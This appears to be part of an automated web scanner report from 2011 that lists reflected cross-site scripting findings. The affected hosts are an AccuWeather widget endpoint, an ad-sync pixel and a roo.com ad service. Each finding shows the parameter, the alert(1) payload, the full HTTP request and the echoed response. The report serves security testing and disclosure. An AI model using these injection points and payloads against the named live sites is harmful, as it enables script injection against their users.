Path:   /adcbin/netweather_v2/netweatherV2ex.asp

Issue detail

The value of the lang request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f38a"%3balert(1)//3a4adeadc39 was submitted in the lang parameter. This input was echoed as 8f38a";alert(1)//3a4adeadc39 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=whteYell&logo=1&zipcode=10001&lang=eng8f38a"%3balert(1)//3a4adeadc39&size=12&theme=lhtblue&metric=0&target=_self HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.channel11newsreport.com/money/work-from-home/?t202id=6598&t202kw=news
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=256067995.1296754760.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/64; s_vi=[CS]v1|26A57416051D2589-4000012C8000F930[CE]; __qca=P0-1763970855-1296754771965; __utma=256067995.1249143252.1296754760.1296754760.1296754760.1

Response

HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 03:07:45 GMT
Server: PWS/1.7.1.2
X-Px: ms jfk-agg-n34 ( jfk-agg-n14), ms jfk-agg-n14 ( origin>CONN)
Cache-Control: max-age=2700
Expires: Tue, 08 Feb 2011 03:52:45 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3919


//v1.0
function AC_AddExtension(src, ext)
{
if (src.indexOf('?') != -1)
return src.replace(/\?/, ext+'?');
else
return src + ext;
}

function AC_Generateobj(objAttrs, params, e
...[SNIP]...
ype;
return ret;
}


RunNetWeather ("id","netWxV2","minversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10001&customtheme=&theme=lhtblue&metric=0&target=_self&lang=eng8f38a";alert(1)//3a4adeadc39&url=&video=&category=&logo=1&tStyle=whteYell&partner=netweather&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10001&customtheme=&theme=lhtblue&metric=0&target=_self&lang=eng8f38a";
...[SNIP]...

1.41. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [logo parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://netweather.accuweather.com
Path:   /adcbin/netweather_v2/netweatherV2ex.asp

Issue detail

The value of the logo request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4da3"%3balert(1)//bd3f4a4236f was submitted in the logo parameter. This input was echoed as a4da3";alert(1)//bd3f4a4236f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=whteYell&logo=1a4da3"%3balert(1)//bd3f4a4236f&zipcode=10001&lang=eng&size=12&theme=lhtblue&metric=0&target=_self HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.channel11newsreport.com/money/work-from-home/?t202id=6598&t202kw=news
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=256067995.1296754760.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/64; s_vi=[CS]v1|26A57416051D2589-4000012C8000F930[CE]; __qca=P0-1763970855-1296754771965; __utma=256067995.1249143252.1296754760.1296754760.1296754760.1

Response

HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 03:07:04 GMT
Server: PWS/1.7.1.2
X-Px: ms jfk-agg-n34 ( jfk-agg-n31), ms jfk-agg-n31 ( origin>CONN)
Cache-Control: max-age=2940
Expires: Tue, 08 Feb 2011 03:56:04 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3919


//v1.0
function AC_AddExtension(src, ext)
{
if (src.indexOf('?') != -1)
return src.replace(/\?/, ext+'?');
else
return src + ext;
}

function AC_Generateobj(objAttrs, params, e
...[SNIP]...
unNetWeather ("id","netWxV2","minversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10001&customtheme=&theme=lhtblue&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1a4da3";alert(1)//bd3f4a4236f&tStyle=whteYell&partner=netweather&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10001&customtheme=&theme=lhtblue&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1a4da3";
...[SNIP]...

1.42. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [metric parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://netweather.accuweather.com
Path:   /adcbin/netweather_v2/netweatherV2ex.asp

Issue detail

The value of the metric request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9f2f"%3balert(1)//943109294fb was submitted in the metric parameter. This input was echoed as c9f2f";alert(1)//943109294fb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=whteYell&logo=1&zipcode=10001&lang=eng&size=12&theme=lhtblue&metric=0c9f2f"%3balert(1)//943109294fb&target=_self HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.channel11newsreport.com/money/work-from-home/?t202id=6598&t202kw=news
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=256067995.1296754760.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/64; s_vi=[CS]v1|26A57416051D2589-4000012C8000F930[CE]; __qca=P0-1763970855-1296754771965; __utma=256067995.1249143252.1296754760.1296754760.1296754760.1

Response

HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 03:08:53 GMT
Server: PWS/1.7.1.2
X-Px: ms jfk-agg-n34 ( jfk-agg-n11), ms jfk-agg-n11 ( origin>CONN)
Cache-Control: max-age=3180
Expires: Tue, 08 Feb 2011 04:01:53 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3919


//v1.0
function AC_AddExtension(src, ext)
{
if (src.indexOf('?') != -1)
return src.replace(/\?/, ext+'?');
else
return src + ext;
}

function AC_Generateobj(objAttrs, params, e
...[SNIP]...
dAttrs["type"] = mimeType;
return ret;
}


RunNetWeather ("id","netWxV2","minversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10001&customtheme=&theme=lhtblue&metric=0c9f2f";alert(1)//943109294fb&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=whteYell&partner=netweather&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10001&customtheme=&theme=lhtblue&metric=0c9f2f";
...[SNIP]...

1.43. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [partner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://netweather.accuweather.com
Path:   /adcbin/netweather_v2/netweatherV2ex.asp

Issue detail

The value of the partner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 319eb"%3balert(1)//bda5567410d was submitted in the partner parameter. This input was echoed as 319eb";alert(1)//bda5567410d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather319eb"%3balert(1)//bda5567410d&tStyle=whteYell&logo=1&zipcode=10001&lang=eng&size=12&theme=lhtblue&metric=0&target=_self HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.channel11newsreport.com/money/work-from-home/?t202id=6598&t202kw=news
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=256067995.1296754760.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/64; s_vi=[CS]v1|26A57416051D2589-4000012C8000F930[CE]; __qca=P0-1763970855-1296754771965; __utma=256067995.1249143252.1296754760.1296754760.1296754760.1

Response

HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 03:06:31 GMT
Server: PWS/1.7.1.2
X-Px: ms jfk-agg-n34 ( jfk-agg-n23), ms jfk-agg-n23 ( origin>CONN)
Cache-Control: max-age=2760
Expires: Tue, 08 Feb 2011 03:52:31 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3919


//v1.0
function AC_AddExtension(src, ext)
{
if (src.indexOf('?') != -1)
return src.replace(/\?/, ext+'?');
else
return src + ext;
}

function AC_Generateobj(objAttrs, params, e
...[SNIP]...
rsion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10001&customtheme=&theme=lhtblue&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=whteYell&partner=netweather319eb";alert(1)//bda5567410d&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10001&customtheme=&theme=lhtblue&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=whteYell&partner=netweather319eb";
...[SNIP]...

1.44. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [tStyle parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://netweather.accuweather.com
Path:   /adcbin/netweather_v2/netweatherV2ex.asp

Issue detail

The value of the tStyle request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4225d"%3balert(1)//807d6220ec9 was submitted in the tStyle parameter. This input was echoed as 4225d";alert(1)//807d6220ec9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=whteYell4225d"%3balert(1)//807d6220ec9&logo=1&zipcode=10001&lang=eng&size=12&theme=lhtblue&metric=0&target=_self HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.channel11newsreport.com/money/work-from-home/?t202id=6598&t202kw=news
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=256067995.1296754760.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/64; s_vi=[CS]v1|26A57416051D2589-4000012C8000F930[CE]; __qca=P0-1763970855-1296754771965; __utma=256067995.1249143252.1296754760.1296754760.1296754760.1

Response

HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 03:06:49 GMT
Server: PWS/1.7.1.2
X-Px: ms jfk-agg-n34 ( jfk-agg-n60), ms jfk-agg-n60 ( origin>CONN)
Cache-Control: max-age=2940
Expires: Tue, 08 Feb 2011 03:55:49 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3919


//v1.0
function AC_AddExtension(src, ext)
{
if (src.indexOf('?') != -1)
return src.replace(/\?/, ext+'?');
else
return src + ext;
}

function AC_Generateobj(objAttrs, params, e
...[SNIP]...
d","netWxV2","minversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10001&customtheme=&theme=lhtblue&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=whteYell4225d";alert(1)//807d6220ec9&partner=netweather&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10001&customtheme=&theme=lhtblue&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=whteYell4225d";
...[SNIP]...

1.45. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://netweather.accuweather.com
Path:   /adcbin/netweather_v2/netweatherV2ex.asp

Issue detail

The value of the target request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca01f"%3balert(1)//2b15cdde25d was submitted in the target parameter. This input was echoed as ca01f";alert(1)//2b15cdde25d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=whteYell&logo=1&zipcode=10001&lang=eng&size=12&theme=lhtblue&metric=0&target=_selfca01f"%3balert(1)//2b15cdde25d HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.channel11newsreport.com/money/work-from-home/?t202id=6598&t202kw=news
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=256067995.1296754760.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/64; s_vi=[CS]v1|26A57416051D2589-4000012C8000F930[CE]; __qca=P0-1763970855-1296754771965; __utma=256067995.1249143252.1296754760.1296754760.1296754760.1

Response

HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 03:09:14 GMT
Server: PWS/1.7.1.2
X-Px: ms jfk-agg-n34 ( jfk-agg-n12), ms jfk-agg-n12 ( origin>CONN)
Cache-Control: max-age=3540
Expires: Tue, 08 Feb 2011 04:08:14 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3919


//v1.0
function AC_AddExtension(src, ext)
{
if (src.indexOf('?') != -1)
return src.replace(/\?/, ext+'?');
else
return src + ext;
}

function AC_Generateobj(objAttrs, params, e
...[SNIP]...
] = mimeType;
return ret;
}


RunNetWeather ("id","netWxV2","minversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10001&customtheme=&theme=lhtblue&metric=0&target=_selfca01f";alert(1)//2b15cdde25d&lang=eng&url=&video=&category=&logo=1&tStyle=whteYell&partner=netweather&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10001&customtheme=&theme=lhtblue&metric=0&target=_selfca01f";
...[SNIP]...

1.46. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [theme parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://netweather.accuweather.com
Path:   /adcbin/netweather_v2/netweatherV2ex.asp

Issue detail

The value of the theme request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1b0a"%3balert(1)//e6dc9c8a978 was submitted in the theme parameter. This input was echoed as c1b0a";alert(1)//e6dc9c8a978 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=whteYell&logo=1&zipcode=10001&lang=eng&size=12&theme=lhtbluec1b0a"%3balert(1)//e6dc9c8a978&metric=0&target=_self HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.channel11newsreport.com/money/work-from-home/?t202id=6598&t202kw=news
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=256067995.1296754760.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/64; s_vi=[CS]v1|26A57416051D2589-4000012C8000F930[CE]; __qca=P0-1763970855-1296754771965; __utma=256067995.1249143252.1296754760.1296754760.1296754760.1

Response

HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 03:08:28 GMT
Server: PWS/1.7.1.2
X-Px: ms jfk-agg-n34 ( jfk-agg-n33), ms jfk-agg-n33 ( origin>CONN)
Cache-Control: max-age=3480
Expires: Tue, 08 Feb 2011 04:06:28 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3919


//v1.0
function AC_AddExtension(src, ext)
{
if (src.indexOf('?') != -1)
return src.replace(/\?/, ext+'?');
else
return src + ext;
}

function AC_Generateobj(objAttrs, params, e
...[SNIP]...
ret.embedAttrs["type"] = mimeType;
return ret;
}


RunNetWeather ("id","netWxV2","minversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10001&customtheme=&theme=lhtbluec1b0a";alert(1)//e6dc9c8a978&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=whteYell&partner=netweather&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10001&customtheme=&theme=lhtbluec1b0a";
...[SNIP]...

1.47. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [zipcode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://netweather.accuweather.com
Path:   /adcbin/netweather_v2/netweatherV2ex.asp

Issue detail

The value of the zipcode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10425"%3balert(1)//7495d05b121 was submitted in the zipcode parameter. This input was echoed as 10425";alert(1)//7495d05b121 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=whteYell&logo=1&zipcode=1000110425"%3balert(1)//7495d05b121&lang=eng&size=12&theme=lhtblue&metric=0&target=_self HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.channel11newsreport.com/money/work-from-home/?t202id=6598&t202kw=news
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=256067995.1296754760.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/64; s_vi=[CS]v1|26A57416051D2589-4000012C8000F930[CE]; __qca=P0-1763970855-1296754771965; __utma=256067995.1249143252.1296754760.1296754760.1296754760.1

Response

HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 03:07:25 GMT
Server: PWS/1.7.1.2
X-Px: ms jfk-agg-n34 ( jfk-agg-n33), ms jfk-agg-n33 ( origin>CONN)
Cache-Control: max-age=3360
Expires: Tue, 08 Feb 2011 04:03:26 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3919


//v1.0
function AC_AddExtension(src, ext)
{
if (src.indexOf('?') != -1)
return src.replace(/\?/, ext+'?');
else
return src + ext;
}

function AC_Generateobj(objAttrs, params, e
...[SNIP]...
uginsPage;
if (mimeType) ret.embedAttrs["type"] = mimeType;
return ret;
}


RunNetWeather ("id","netWxV2","minversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=1000110425";alert(1)//7495d05b121&customtheme=&theme=lhtblue&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=whteYell&partner=netweather&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=1000110425";
...[SNIP]...

1.48. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /admeld_sync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98db7'%3balert(1)//268143c519 was submitted in the admeld_callback parameter. This input was echoed as 98db7';alert(1)//268143c519 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /admeld_sync?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match98db7'%3balert(1)//268143c519 HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/14/nypost/300x250/below-fold?t=1297130902623&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.nypost.com%2F&refer=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=82d726c3-44ee-407c-85c4-39a0b0fc11ef; exchange_uid=eyIyIjogWyI0NzYwNDkyOTk5MjEzODAxNzMzIiwgNzM0MTcwXSwgIjQiOiBbIkNBRVNFSk81T0hYNWxOR0lITDdmRUVFSjQtWSIsIDczNDE1MV19; segments="38142|28666|17440|16748|3779|10069|18237|16490|39544|27804|16709|21886|18134|38582,1298044270|40657|22647|24085|10102|24391|30353|11262|5371|11265|10629|7775|10660|17277|8|16034|40589|10816|13746|27875|28398|39650|27906|40046|20981|10641|39646|29998|39220|39004|24461|4465|38028|16713|29994|3391|3783|24171|3392|23864|3425|9800|37720|24810|38781|27273|2377|24469"; dp_rec="{\"1\": 1297089043+ \"3\": 1297036137+ \"2\": 1296508071+ \"4\": 1296660699}"; io_frequency="{\"8866\": [0+ 0+ 1296072684+ 1+ 1296072684+ 1]+ \"8171\": [0+ 0+ 1296660699+ 2+ 1296659838+ 2]+ \"8991\": [0+ 0+ 1297089042+ 2+ 1297089042+ 1]+ \"8733\": [0+ 0+ 1295634039+ 1+ 1295634039+ 1]+ \"9376\": [0+ 0+ 1296659628+ 1+ 1296659628+ 1]}"; impressions="{\"429622\": [1295634039+ \"94ea05fe-2d4a-3bf7-a98e-3964b49408cd\"+ 83803+ 56236+ 46]+ \"417817\": [1296072684+ \"5b6de59f-cbbc-3ba4-8c51-0a4d6d7a0ec7\"+ 8863+ 40494+ 9173]+ \"351309\": [1296660699+ \"6b326db0-ad1f-378f-98c3-837da14b6503\"+ 139089+ 81343+ 191]+ \"426722\": [1297089042+ \"cf924af7-fb85-3eb0-b32f-8647072b898d\"+ 12202+ 59105+ 993]+ \"456235\": [1296659628+ \"85680993-10ca-3909-9c72-ac737305e927\"+ 139089+ 81343+ 191]}"; partnerUID=eyIzOCI6ICJ1JTNENjI4NTE2MDUyNiUzQXMxJTNEMTI5NTQ4MjM3NjkxNyUzQXRzJTNEMTI5NzA4ODIyNDE1MCUzQXMyLjMzJTNEJTJDNjU3MCUyQzcwNTMlMkM2MzMzJTJDNTIyMyUyQzI3IiwgIjg0IjogWyJEVFFrZTdUOTk5WTRxWUpCIiwgdHJ1ZV19; frequency="{\"429622\": [1295893239+ 1+ 1295634039+ 1+ 1295634039+ 1]+ \"417817\": [1297368684+ 1+ 1296072684+ 1+ 1296072684+ 1]+ \"351309\": [1296660759+ 1+ 1296660699+ 2+ 1296659838+ 2]+ \"426722\": [1297103442+ 1+ 1297089042+ 2+ 1297089042+ 1]+ \"456235\": [1296659688+ 1+ 1296659628+ 1+ 1296659628+ 1]}"; subID="{}"

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Tue, 08 Feb 2011 02:08:58 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Tue, 08-Feb-2011 02:08:38 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 717

document.write('<img width="0" height="0" src="http://tag.admeld.com/match98db7';alert(1)//268143c519?admeld_adprovider_id=300&external_user_id=82d726c3-44ee-407c-85c4-39a0b0fc11ef&Expiration=1297562938&custom_user_segments=%2C38142%2C28666%2C17440%2C16748%2C3779%2C10069%2C18237%2C16490%2C39544%2C2780
...[SNIP]...

1.49. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/AdServerService.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/AdServerService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 82198<a>9dafe648ad3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/AdServerService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790&82198<a>9dafe648ad3=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 02:38:20 GMT
Content-Length: 1913
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790&82198<a>9dafe648ad3=1/AdServerService.asmx" />
...[SNIP]...

1.50. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/AdServerService.aspx [siteid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/AdServerService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 617ba<a>cdb0e19b088 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/AdServerService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790617ba<a>cdb0e19b088 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 02:38:18 GMT
Content-Length: 1907
Connection: close

